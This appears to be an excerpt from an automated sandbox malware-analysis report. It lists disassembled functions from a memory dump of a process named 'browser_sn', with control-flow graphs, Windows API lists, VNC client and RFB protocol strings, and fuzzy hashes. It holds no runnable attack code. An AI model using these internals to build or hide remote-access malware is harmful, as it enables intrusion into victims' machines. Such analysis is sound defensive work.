                                                                            control_flow_graph 562 7ff6c2b89d00-7ff6c2b89d9b call 7ff6c2b829a0 565 7ff6c2b89db3-7ff6c2b89dc7 OpenSCManagerA 562->565 566 7ff6c2b89d9d 562->566 568 7ff6c2b89de0-7ff6c2b89e25 EnumServicesStatusA 565->568 569 7ff6c2b89dc9-7ff6c2b89dce 565->569 567 7ff6c2b89da0-7ff6c2b89db1 call 7ff6c2c38894 566->567 567->565 570 7ff6c2b89e2b-7ff6c2b89e36 GetLastError 568->570 571 7ff6c2b89fed-7ff6c2b89ffc CloseServiceHandle 568->571 573 7ff6c2b89dd0-7ff6c2b89dd4 call 7ff6c2c37914 569->573 574 7ff6c2b89dd9-7ff6c2b89ddb 569->574 570->571 576 7ff6c2b89e3c-7ff6c2b89e3f call 7ff6c2c371fc 570->576 577 7ff6c2b89ffe-7ff6c2b8a002 call 7ff6c2c37914 571->577 578 7ff6c2b8a007 571->578 573->574 575 7ff6c2b8a00b-7ff6c2b8a031 call 7ff6c2c37220 574->575 584 7ff6c2b89e44-7ff6c2b89e4e 576->584 577->578 578->575 584->571 586 7ff6c2b89e54-7ff6c2b89e8d EnumServicesStatusA 584->586 587 7ff6c2b89e93-7ff6c2b89e9a 586->587 588 7ff6c2b89fe5-7ff6c2b89fe8 call 7ff6c2c378d4 586->588 587->588 590 7ff6c2b89ea0 587->590 588->571 591 7ff6c2b89ea3-7ff6c2b89ea6 590->591 592 7ff6c2b89fe1 591->592 593 7ff6c2b89eac-7ff6c2b89ec5 OpenServiceA 591->593 592->588 593->592 594 7ff6c2b89ecb-7ff6c2b89edf QueryServiceConfigA 593->594 595 7ff6c2b89ee5-7ff6c2b89eee GetLastError 594->595 596 7ff6c2b89fc7-7ff6c2b89fdb CloseServiceHandle 594->596 595->596 597 7ff6c2b89ef4-7ff6c2b89f02 call 7ff6c2c371fc 595->597 596->591 596->592 597->596 600 7ff6c2b89f08-7ff6c2b89f1e QueryServiceConfigA 597->600 601 7ff6c2b89fbf-7ff6c2b89fc2 call 7ff6c2c378d4 600->601 602 7ff6c2b89f24-7ff6c2b89f8d call 7ff6c2b829a0 call 7ff6c2b89c80 call 7ff6c2b8a120 600->602 601->596 610 7ff6c2b89faf-7ff6c2b89fb4 602->610 611 7ff6c2b89f8f-7ff6c2b89fa8 call 7ff6c2c385e0 602->611 610->601 613 7ff6c2b89fb6-7ff6c2b89fba call 7ff6c2c37914 610->613 611->610 613->601
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                            • String ID:
                                                                            • API String ID: 3151975580-0
                                                                            • Opcode ID: 206915db20c792c327387590d73ad61a55f2024e8acff6b1f3143c7cd7f65b41
                                                                            • Instruction ID: ba535599351a8d29a55755d7e0b457b2745a3d3646493115d2a1075fa7feea2a
                                                                            • Opcode Fuzzy Hash: 206915db20c792c327387590d73ad61a55f2024e8acff6b1f3143c7cd7f65b41
                                                                            • Instruction Fuzzy Hash: C6918022B08A4289FB54DF61D4146ED33B1BB057ADF400636DEAE97B98DF78E509C340
                                                                            Function 00007FF6C2BA8590 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 165windowsynchronizationCOMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 308 7ff6c2ba8590-7ff6c2ba85de call 7ff6c2b83730 311 7ff6c2ba85e0-7ff6c2ba85e9 308->311 312 7ff6c2ba862f-7ff6c2ba8639 308->312 313 7ff6c2ba8612-7ff6c2ba861c 311->313 314 7ff6c2ba85eb-7ff6c2ba860e SendMessageA WaitForSingleObject 311->314 315 7ff6c2ba8645-7ff6c2ba864f 312->315 316 7ff6c2ba863b-7ff6c2ba863e 312->316 317 7ff6c2ba861e-7ff6c2ba8626 call 7ff6c2b94110 313->317 318 7ff6c2ba8628 313->318 314->313 319 7ff6c2ba8651-7ff6c2ba8656 call 7ff6c2c38bf4 315->319 320 7ff6c2ba865d-7ff6c2ba8664 315->320 316->315 317->318 318->312 319->320 322 7ff6c2ba8666-7ff6c2ba8688 call 7ff6c2b83730 320->322 323 7ff6c2ba869b-7ff6c2ba86a5 320->323 332 7ff6c2ba8694 322->332 333 7ff6c2ba868a-7ff6c2ba868d 322->333 324 7ff6c2ba86b3-7ff6c2ba86bd 323->324 325 7ff6c2ba86a7-7ff6c2ba86ac call 7ff6c2c378d4 323->325 330 7ff6c2ba86bf-7ff6c2ba86c4 call 7ff6c2c378d4 324->330 331 7ff6c2ba86cb-7ff6c2ba86d5 324->331 325->324 330->331 336 7ff6c2ba86d7 call 7ff6c2c378d4 331->336 337 7ff6c2ba86dc-7ff6c2ba86e6 331->337 332->323 333->332 336->337 338 7ff6c2ba86e8 call 7ff6c2c378d4 337->338 339 7ff6c2ba86ed-7ff6c2ba86f7 337->339 338->339 343 7ff6c2ba86fe-7ff6c2ba8704 339->343 344 7ff6c2ba86f9 call 7ff6c2c378d4 339->344 346 7ff6c2ba8706-7ff6c2ba870d 343->346 347 7ff6c2ba8757-7ff6c2ba8761 343->347 344->343 346->347 350 7ff6c2ba870f-7ff6c2ba8719 346->350 348 7ff6c2ba8763 call 7ff6c2c38bf4 347->348 349 7ff6c2ba8768-7ff6c2ba8772 347->349 348->349 352 7ff6c2ba8774-7ff6c2ba8779 call 7ff6c2c38bf4 349->352 353 7ff6c2ba877a-7ff6c2ba8782 349->353 354 7ff6c2ba8736-7ff6c2ba873e call 7ff6c2bea220 350->354 355 7ff6c2ba871b-7ff6c2ba8723 350->355 352->353 357 7ff6c2ba8790-7ff6c2ba87b3 353->357 358 7ff6c2ba8784-7ff6c2ba878b call 7ff6c2c37914 353->358 354->347 366 7ff6c2ba8740-7ff6c2ba8751 SendMessageA 354->366 355->347 367 7ff6c2ba8725-7ff6c2ba8734 355->367 364 7ff6c2ba87b5-7ff6c2ba87bb FreeLibrary 357->364 365 7ff6c2ba87bc-7ff6c2ba87dc call 7ff6c2c378d4 * 2 357->365 358->357 364->365 373 7ff6c2ba87de-7ff6c2ba87e5 call 7ff6c2c37914 365->373 374 7ff6c2ba87ea-7ff6c2ba8896 DeleteObject call 7ff6c2c38bf4 DeleteObject call 7ff6c2c38bf4 DeleteObject call 7ff6c2c38bf4 DeleteObject call 7ff6c2c38bf4 365->374 366->347 367->347 367->354 373->374
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                            • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                            • API String ID: 2172171234-2418058073
                                                                            • Opcode ID: fc85aa9d4cb6258011c7a359a753eb1dcec1c46ba5e9220cec0b0a70b71eb708
                                                                            • Instruction ID: e68241fd27fc06f722ed33b5842ea64f338f41330910e13a41d348e06adf2fe0
                                                                            • Opcode Fuzzy Hash: fc85aa9d4cb6258011c7a359a753eb1dcec1c46ba5e9220cec0b0a70b71eb708
                                                                            • Instruction Fuzzy Hash: 0E812735A09A8281FB84DF25D8942B83360FF85F8EF080631CE9D8BB95CFA9D455C310
                                                                            Function 00007FF6C2BD2FF0 Relevance: 27.2, APIs: 18, Instructions: 183windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1935883720-0
                                                                            • Opcode ID: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
                                                                            • Instruction ID: 098baca78591b62d47df97fdfa5f233ca62efdc7bc3841b200a4d9560b079e42
                                                                            • Opcode Fuzzy Hash: b06cfa2c7c9d91227a6909707f994effb4396744763fd6e6bbb979b6844d4978
                                                                            • Instruction Fuzzy Hash: 9261A321A08A4282EB90DF25E4543BA33A1FF89B9EF548131DE9D87B99CFBCD445C740
                                                                            Function 00007FF6C2C175C0 Relevance: 25.7, APIs: 17, Instructions: 151threadmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                            • String ID:
                                                                            • API String ID: 772457954-0
                                                                            • Opcode ID: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
                                                                            • Instruction ID: f32c9bfc55c9d829992c076adf25813c940d0888f580fcf5ef320121001a63ff
                                                                            • Opcode Fuzzy Hash: e985c1ffb6018769c2b4a3bbbdc3cfbe5cf815ae3250197a8d1e99eeffc1a444
                                                                            • Instruction Fuzzy Hash: 7B613935A08B4286EB809F25A84527977B0FF48B8AF104535DF8E83765DFBCE099C780
                                                                            Function 00007FF6C2B9F940 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 183COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 493 7ff6c2b9f940-7ff6c2b9f979 494 7ff6c2b9f980-7ff6c2b9f9ab 493->494 495 7ff6c2b9f9b1-7ff6c2b9f9cc call 7ff6c2c37c50 494->495 496 7ff6c2b9fb19-7ff6c2b9fb25 494->496 502 7ff6c2b9f9cf 495->502 498 7ff6c2b9fb29-7ff6c2b9fb42 call 7ff6c2c37d30 496->498 503 7ff6c2b9fb50-7ff6c2b9fb69 call 7ff6c2c37d30 498->503 504 7ff6c2b9fb44 498->504 505 7ff6c2b9f9d1-7ff6c2b9f9d3 502->505 507 7ff6c2b9fb49-7ff6c2b9fb4b 503->507 513 7ff6c2b9fb6b-7ff6c2b9fb95 call 7ff6c2c38bbc 503->513 504->494 505->507 508 7ff6c2b9f9d9-7ff6c2b9f9e5 505->508 509 7ff6c2b9fc43-7ff6c2b9fc6d call 7ff6c2c37220 507->509 511 7ff6c2b9fae6-7ff6c2b9fafc SleepEx 508->511 512 7ff6c2b9f9eb-7ff6c2b9f9f4 508->512 521 7ff6c2b9fb02-7ff6c2b9fb04 511->521 514 7ff6c2b9faaa 512->514 515 7ff6c2b9f9fa-7ff6c2b9fa02 512->515 513->507 529 7ff6c2b9fb97-7ff6c2b9fbf8 call 7ff6c2b83730 513->529 517 7ff6c2b9faaf-7ff6c2b9fab8 call 7ff6c2bed1f0 514->517 515->514 519 7ff6c2b9fa08-7ff6c2b9fa0f 515->519 528 7ff6c2b9fabd-7ff6c2b9fac8 517->528 524 7ff6c2b9fa11-7ff6c2b9fa34 519->524 525 7ff6c2b9fa39-7ff6c2b9fa44 519->525 526 7ff6c2b9fb12-7ff6c2b9fb14 521->526 527 7ff6c2b9fb06-7ff6c2b9fb0d 521->527 530 7ff6c2b9faca-7ff6c2b9fae4 call 7ff6c2bed890 524->530 531 7ff6c2b9fa5e-7ff6c2b9fa9e EnterCriticalSection LeaveCriticalSection 525->531 532 7ff6c2b9fa46-7ff6c2b9fa5c 525->532 526->505 527->502 528->511 528->530 542 7ff6c2b9fc3e 529->542 543 7ff6c2b9fbfa-7ff6c2b9fc06 529->543 530->498 530->511 538 7ff6c2b9faa4-7ff6c2b9faa8 531->538 532->538 538->517 542->509 543->542 544 7ff6c2b9fc08-7ff6c2b9fc1d 543->544 544->542 546 7ff6c2b9fc1f-7ff6c2b9fc2c 544->546 546->542 547 7ff6c2b9fc2e-7ff6c2b9fc3a 546->547 547->542
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                            • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                                            • API String ID: 958158500-3765181313
                                                                            • Opcode ID: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                                            • Instruction ID: 298ef722397237e21381308bb675885275635e4e3359c2cd65bf48b582e5882b
                                                                            • Opcode Fuzzy Hash: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
                                                                            • Instruction Fuzzy Hash: 64918D22608A8286EB60DF15E4887AE77B5FB85B9DF404136DE8D837A4CFBCD549C700
                                                                            Function 00007FF6C2BE9D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                            • String ID: ?
                                                                            • API String ID: 2900023865-1684325040
                                                                            • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                            • Instruction ID: c66aa28c4eee3215509e8c3411cac143a44297abd9ce873266fbc71e85d0e56d
                                                                            • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                            • Instruction Fuzzy Hash: A031D332609F8285E6A08F21F8443AAB7A4FB8A789F504075DACD87B58DF7DD059CB40
                                                                            Function 00007FF6C2BA80DA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                            • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                                            • API String ID: 1369618222-3178290357
                                                                            • Opcode ID: 35763fb2557c9489e4576fa8d485d6919a2073118b788ba794957893b6d6bdd5
                                                                            • Instruction ID: 1ff11d206c93633b0c0b04e247c8ad449ed52adb766799372c66711f09ec0a6b
                                                                            • Opcode Fuzzy Hash: 35763fb2557c9489e4576fa8d485d6919a2073118b788ba794957893b6d6bdd5
                                                                            • Instruction Fuzzy Hash: B5B11A32615BD1A6E348CF24EA443DD77A8F745B48F14423AE7A847B91CFBA6076C740
                                                                            Function 00007FF6C2C17B50 Relevance: 10.6, APIs: 7, Instructions: 81threadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                            • String ID:
                                                                            • API String ID: 1366308849-0
                                                                            • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                            • Instruction ID: 4a488184d4e31daefc423f4503b9450e7bd32ba1243f11fe67ca5e72e462f255
                                                                            • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                            • Instruction Fuzzy Hash: D0316032A08A4296EB908F24E45517A73B0FF9475EF100136DB8D837A9DFBCD489C740
                                                                            Function 00007FF6C2BECF90 Relevance: 9.1, APIs: 6, Instructions: 110networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                            • String ID:
                                                                            • API String ID: 2120259006-0
                                                                            • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                            • Instruction ID: d2a4226fe59d7be7352b25ad0740e4ce372bea01e7a23793d1626c3f2f5aa590
                                                                            • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                            • Instruction Fuzzy Hash: 85510272604B82DEE764CF30D48469977A4FB4870DF004526EB9C87B48DBB8E6A5CB90
                                                                            Function 00007FF6C2C4285C Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                                            Download Yara Rule

